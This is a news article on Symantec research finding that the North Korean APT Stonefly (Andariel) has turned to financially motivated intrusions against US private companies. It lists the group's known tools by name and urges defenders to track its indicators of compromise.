North Korea's 'Stonefly' APT Swarms US Private Co's. for Profit

A well-known North Korean advanced persistent threat (APT) has shifted its focus to targeting private companies in the US for financial gain.

Researchers at Symantec's Threat Hunter Team said this week that the state-sponsored group it tracks as "Stonefly" (aka Andariel, APT45, Silent Chollima, and Onyx Sleet) is flaunting an indictment and a $10 million bounty from the US Department of Justice (DoJ), in order to rack up more funds for the Kim Jong-Un regime.

"Sometimes when you see an indictment against a certain actor, they'll disappear or retool, even if they're based in another jurisdiction," Dick O’Brien, part of the Threat Hunters team at Symantec, tells Dark Reading. "In this case, it seems to be very much business as usual for Stonefly."

Stonefly, which is part of North Korea's Reconnaissance General Bureau (RGB), mounted assaults on three organizations in the US in August, about a month after the DoJ moved against the group. The victims, the researchers noted, had "no obvious intelligence value," and were likely being prepped for a ransomware whammy — though the intrusions were detected before the endgame could play out.

The focus on snapping up funds is a relatively new flex for the group, Symantec researchers stressed, even though other North Korean APTs are dedicated to grifting foreign currency for the regime. Stonefly in the past targeted hospitals and other healthcare providers during the pandemic (which drew the DoJ scrutiny), and is known for going after high-value espionage targets like US Air Force bases, NASA Office of Inspector General, and government organizations in China, South Korea, and Taiwan.

"This is a significant development for Stonefly," says O'Brien. "They're one of the more adept North Korean groups and have a history of compromising high-value targets. We previously considered them as something of an elite unit who wouldn't get involved in financial attacks. There's either increased pressure to raise money or they've been doing it all along and just haven't been detected until quite recently."

Look for Stonefly's IoCs to Swat Ransomware Attacks

With Stonefly's less-targeted focus on siphoning funds from unsuspecting private companies, it pays for everyday businesses that might not normally think of themselves as APT targets to get familiar with the group's indicators of compromise (IoCs). Stonefly's activity is, after all, likely much more prolific than just the campaigns flagged by Symantec.

"There are likely many more victims," O'Brien stresses. "The attacks we observed were only those mounted against our customers. The true figure is likely going to be multiples of this."

And there are many IoCs to incorporate into defenses. While the ransomware never deployed in the August attacks, and the initial compromise path isn't clear, Stonefly still managed to smuggle in plenty of tools from its kit before being ultimately thwarted, which can be used to fingerprint the group's activity.

"In several of the attacks, Stonefly's custom malware Backdoor.Preft (aka Dtrack, Valefor) was deployed," according to Symantec's blog post. "In addition … attackers used a fake Tableau certificate documented by Microsoft in addition to two other certificates that appear to be unique to this campaign."

The toolbox also included Nukebot, which is a backdoor capable of executing commands, downloading and uploading files, and taking screenshots; Mimikatz; two different keyloggers; the Sliver open source cross-platform penetration testing framework; the PuTTY SSH client; Plink; Megatools; a utility that takes snapshots of folder structures on a hard drive and saves them as HTML files; and FastReverseProxy, which can expose local servers to the public Internet.